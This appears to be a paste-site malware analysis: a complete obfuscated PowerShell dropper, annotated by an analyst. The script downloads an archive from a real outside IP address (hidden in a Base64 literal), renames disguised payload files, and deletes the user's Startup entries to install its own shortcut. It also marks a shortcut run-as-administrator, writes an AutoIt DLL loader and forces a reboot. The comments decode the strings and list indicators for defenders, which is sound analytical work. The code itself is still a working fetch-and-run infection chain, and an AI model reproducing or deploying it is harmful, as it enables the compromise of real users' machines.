James_inthe_box

Dropper

Jun 27th, 2019
  # Analyst notes: configuration strings for the dropper. Each Base64 literal is decoded as
  # UTF-16LE ([Text.Encoding]::Unicode). Decoded values:
  #   'ZQB4AGUA'  -> "exe"   (extension given to the extracted executable)
  #   'egBpAHAA'  -> "zip"   (extension of the downloaded archive)
  #   long literal -> hxxp://51.91.248[.]86/uk/M2406/kk/md.zip   (download URL, defanged here)
  1. ${_/|\_/|////\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQB4AGUA')))
  2. ${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('egBpAHAA')))
  3. ${_/|\_/|////\__|//\\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA1ADEALgA5ADEALgAyADQAOAAuADgANgAvAHUAawAvAE0AMgA0ADAANgAvAGsAawAvAG0AZAAuAHoAaQBwAA==')))
  # Staging root: the two assignments below build the string "c:\users\public".
  4. ${_/|\_/|/\\\\\\\/|_} = "public"
  5. ${_\\\\\\/|\_/|/\\\\\\\/|_} = "c:\users\${_/|\_/|/\\\\\\\/|_}"
  # Analyst note: random-name generator, takes no parameters.
  # Returns "Java_" + six letters picked from the lowercase list + one of "2_".."9_" + one
  # letter from the upper-cased list, e.g. "Java_qwertz5_K" (constructed sample).
  # The result is reused by the rest of the script as the directory name and file base name,
  # so a pattern such as Java_[a-z]{6}[2-9]_[A-Z] under c:\users\public is a hunting lead.
  6. Function ____////////\\\/\/\/\/\_____ {
  # Lowercase alphabet used for the name (the list omits i, l and o).
  7. ${_|||||||||||||________________} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
  # Digit-plus-underscore tokens.
  8. ${_|||||||||||||//////________________} = "2_","3_","4_","5_","6_","7_","8_","9_"
  # Accumulator for the generated suffix; starts as $null and is built with += below.
  9. ${_|||||||||||||//////\\\\\________________} = $null
  # Random picks: 6 lowercase letters, 1 digit token, 1 upper-cased letter.
  10. ${__|||||||||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________} -Count 6
  11. ${__||||||_|||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||//////________________} -Count 1
  12. ${__||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1
  # Concatenate the picks in order: letters, digit token, uppercase letter.
  13. foreach($n in ${__|||||||||||||//////\\\\\________________}) {
  14. ${_|||||||||||||//////\\\\\________________} += $n
  15. }
  16. foreach ($n2 in ${__||||||_|||||||//////\\\\\________________}) {
  17. ${_|||||||||||||//////\\\\\________________} += $n2
  18. }
  19. foreach ($n3 in ${__||||||_||||||_|//////\\\\\________________}) {
  20. ${_|||||||||||||//////\\\\\________________} += $n3
  21. }
  # Fixed "Java_" prefix in front of the random suffix.
  22. return "Java_${_|||||||||||||//////\\\\\________________}"
  23. }
  # Analyst notes: per-run name and infection-marker check.
  # Line 24 stores the generated "Java_..." name that every later path is built from.
  24. ${_\\\\\\/|\_/|/\\\___\\\\/|_} = ____////////\\\/\/\/\/\_____
  # Marker file path: c:\users\public\i.dat (written near the end of the else-branch below).
  25. ${_\\\\\__\/|\_/|/\\\___\\\\/|_} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
  # The path string is never empty, so this evaluates Test-Path on the marker file.
  26. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} = if (${_\\\\\__\/|\_/|/\\\___\\\\/|_}) { Test-Path ${_\\\\\__\/|\_/|/\\\___\\\\/|_} }
  # Bare variable: emits the Test-Path result to the output stream.
  27. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_}
  # Analyst notes for the main branch. If the marker c:\users\public\i.dat already exists the
  # script exits without doing anything (run-once guard). Otherwise it stages the payload,
  # sets up persistence and schedules a reboot. Host artifacts visible in this branch:
  #   c:\users\public\<name>\            staging directory (<name> = generated "Java_..." string)
  #   c:\users\public\<name>\<name>.zip  downloaded archive
  #   c:\users\public\<name>\<name>.exe, <name>.LNS, <name>1.LNS, sqlite3.dll
  #   <Startup>\<name>.lnk, c:\users\public\c.lnk, c:\users\public\chrome.lnk
  #   c:\users\public\i.dat              marker containing <name>
  28. if(${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} -eq 'True'){
  29. exit
  30. }else{
  # Create the staging directory and download the archive into it with System.Net.WebClient.
  31. New-Item -ItemType directory -Path ${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}
  32. ${_\\\///////\\\\\\\\\\/_} = new-object System.Net.WebClient
  33. ${_\\\///////\\\\\\\\\\/_}.DownloadFile(${_/|\_/|////\__|//\\\\\\\\/|_},"${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.zip")
  # Unpack the zip through the Shell.Application COM object (CopyHere of the archive's items
  # into the staging directory).
  34. ${_\\\//////||\||||/\\\\\\\/_} = new-object -com shell.application
  35. ${_/\/\/\/\/\/\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_}")
  36. ${_/\/\/\/\/\/__|\\\||||||\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}")
  37. ${_/\/\/\/\/\/__|\\\||||||\/\/_}.Copyhere(${_/\/\/\/\/\/\/\/_}.items())
  # Archive members carry misleading extensions and are renamed after extraction:
  #   exe.png -> <name>.exe,  12.dll -> <name>.LNS,  sql.png -> sqlite3.dll
  38. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_/|\_/|////\__|/_|\\\\\\/|_}.png")
  39. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\12.dll")
  40. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sqlite3.dll") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sql.png")
  # Shortcut builder #1. The first parameter is the .lnk path to create; the second parameter
  # is declared but never read in the body. The shortcut runs <name>.exe with the arguments
  # " <name>1.LNS <name>" from the staging directory, WindowStyle 7 (minimized), and an icon
  # string that decodes to "%ProgramFiles%\Internet Explorer\iexplore.exe,1".
  # try{}finally{} has no catch block, so it does not handle errors.
  41. function _____/\_/\/\_/\/=\
  42. {
  43. Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
  44. try{
  45. ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
  46. ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
  47. ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
  48. ${/=\/\__/=\/=\/=\_}.Arguments = " ${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS ${_\\\\\\/|\_/|/\\\___\\\\/|_}"
  49. ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}"
  50. ${/=\/\__/=\/=\/=\_}.WindowStyle = 7
  51. ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
  52. ${/=\/\__/=\/=\/=\_}.Save()
  53. }finally{}
  54. }
  # Persistence: resolve the current user's Startup folder (the Base64 literal decodes to
  # "startup"), delete every *.vbs and *.lnk already there, then create <Startup>\<name>.lnk
  # with builder #1. Unexpected deletion of Startup entries is itself a detection signal.
  55. ${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
  56. ${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
  57. del ${/=\_/\_/===\/\/\/}\*.vbs
  58. del ${/=\_/\_/===\/\/\/}\*.lnk
  # The two variables interpolated after $env:APPDATA are not assigned anywhere in the visible
  # script, and the resulting string is only passed as the unused second argument.
  59. ${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
  60. ${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
  61.  
  62. _____/\_/\/\_/\/=\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
  63.  
  # Second copy of the same shortcut at c:\users\public\c.lnk, then a raw byte patch of the
  # .lnk file. Offset 0x14 is the LinkFlags field of the Shell Link header, so setting 0x20 in
  # byte 0x15 corresponds to LinkFlags 0x2000 (RunAsUser, the "Run as administrator" option).
  64. _____/\_/\/\_/\/=\ "c:\users\public\c.lnk" ${_/=\/=\/\_/\/=\__}
  65. $bytes = [System.IO.File]::ReadAllBytes("c:\users\public\c.lnk")
  66. $bytes[0x15] = $bytes[0x15] -bor 0x20 #set byte 21 (0x15) bit 6 (0x20) ON
  67. [System.IO.File]::WriteAllBytes("c:\users\public\c.lnk", $bytes)
  # Shortcut builder #2. Same shape as builder #1 (second parameter unused). The target is
  # c:\users\public\<name>.vbs, a file the visible script never creates. The description
  # decodes to "Acessar a internet." including the quote characters (Portuguese for "Access
  # the internet"). The icon variable is not assigned in the visible script.
  68. function _____/\_/\/\_/\/=\\///\/\/\
  69. {
  70. Param([string]${___/\_/=\\/\/\\___/\_/==},[string]${__||_/\_/=\\/\/\\___/\_/==});
  71. try{
  72. ${__||_/\_/=\\/\/||\\___/\_/==} = New-Object -ComObject WScript.Shell
  73. ${__||/=\\/\/||\\___/\_/==} = ${__||_/\_/=\\/\/||\\___/\_/==}.CreateShortcut(${___/\_/=\\/\/\\___/\_/==})
  74. ${__||/=\\/\/||\\___/\_/==}.TargetPath = "c:\users\${_/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.vbs"
  75. ${__||/=\\/\/||\\___/\_/==}.Arguments = ""
  76. ${__||/=\\/\/||\\___/\_/==}.Description = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBBAGMAZQBzAHMAYQByACAAYQAgAGkAbgB0AGUAcgBuAGUAdAAuACIA')));
  77. ${__||/=\\/\/||\\___/\_/==}.WorkingDirectory = ""
  78. ${__||/=\\/\/||\\___/\_/==}.IconLocation = "${_/\/\/\/\__/\|_||_|____}"
  79. ${__||/=\\/\/||\\___/\_/==}.Save()
  80. }finally{}
  81. }
  82.  
  # Write the generated name into the marker c:\users\public\i.dat. The same value is written
  # three times (Set-Content, Out-File, redirection); each write replaces the previous one.
  83. ${_/\/\/\__\\\\\\\|||\/\/_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
  84. ${_/\/\/\__\\\\\\\|||\/\/_} | Set-Content "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
  85. ${_/\/\/\__\\\\\\\|||\/\/_} | Out-File "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
  86. ${_/\/\/\__\\\\\\\|||\/\/_} > "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
  87.  
  # Create c:\users\public\chrome.lnk with builder #2 (second argument is unset at this scope).
  88. ${___/\_/\/===\/\__} = "c:\users\public\chrome.lnk"
  89. _____/\_/\/\_/\/=\\///\/\/\ ${___/\_/\/===\/\__} ${__||_/\_/=\\/\/\\___/\_/==}
  90.  
  # Loader script generation. The fragments decode to "Line" and "Cmd" and are joined with "$"
  # and '86' to write the following lines into <name>1.LNS in the staging directory:
  #   #NoTrayIcon
  #   Global $<name> = $CmdLine[1]
  #   Global $<name>86 = DllOpen('<name>.LNS')
  #   DllCall($<name>86, 'STRUCT', 'JLI_CmdToArgs')
  # These are AutoIt-style statements, so the renamed <name>.exe is presumably an AutoIt
  # interpreter that loads <name>.LNS (the renamed 12.dll) and calls its JLI_CmdToArgs
  # export - confirm against the archive contents. $ArquivoSaida is assigned but never used.
  91. ${_/|\_/|//______//\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABpAG4AZQA=')))
  92. ${_/|\_\\\||||||||||///\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBtAGQA')))
  93. ${_/|\_\\\///\\/|_} = '86'
  94. ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_} = "$"
  95. $Arquivo = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
  96.  
  97. $ArquivoSaida ="${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
  98. Add-Content $Arquivo '#NoTrayIcon'
  99. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_} = ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_/|\_\\\||||||||||///\\/|_}${_/|\_/|//______//\__|/_|\\\\\\/|_}[1]"
  100. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_} = DllOpen('${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS')"
  101. Add-Content $Arquivo "DllCall(${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_}, 'STRUCT', 'JLI_CmdToArgs')"
  102.  
  103.  
  # Forced reboot after 200 seconds. The payload is not started directly in this script; the
  # Startup shortcut created above would launch it at the next logon. A shutdown.exe -r
  # spawned by powershell.exe shortly after a download is a useful correlation point.
  104. C:\WINDOWS\system32\shutdown.exe -r -t 200
  105.  
  106. }